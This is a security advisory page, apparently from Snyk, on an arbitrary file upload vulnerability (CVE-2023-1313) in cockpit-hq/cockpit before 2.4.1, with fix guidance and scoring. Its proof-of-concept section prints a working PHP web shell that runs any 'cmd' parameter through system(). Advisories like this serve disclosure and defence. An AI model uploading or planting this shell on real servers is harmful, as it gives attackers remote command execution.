Arbitrary File Upload Affecting cockpit-hq/cockpit package, versions <2.4.1
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.1% (44th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-COCKPITHQCOCKPIT-3358377
- published 10 Mar 2023
- disclosed 10 Mar 2023
- credit choocs
Introduced: 10 Mar 2023
CVE-2023-1313 Open this link in a new tabHow to fix?
Upgrade cockpit-hq/cockpit
to version 2.4.1 or higher.
Overview
Affected versions of this package are vulnerable to Arbitrary File Upload due to improper user-input sanitization in the assets manager
module.
PoC
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
References
CVSS Scores
version 3.1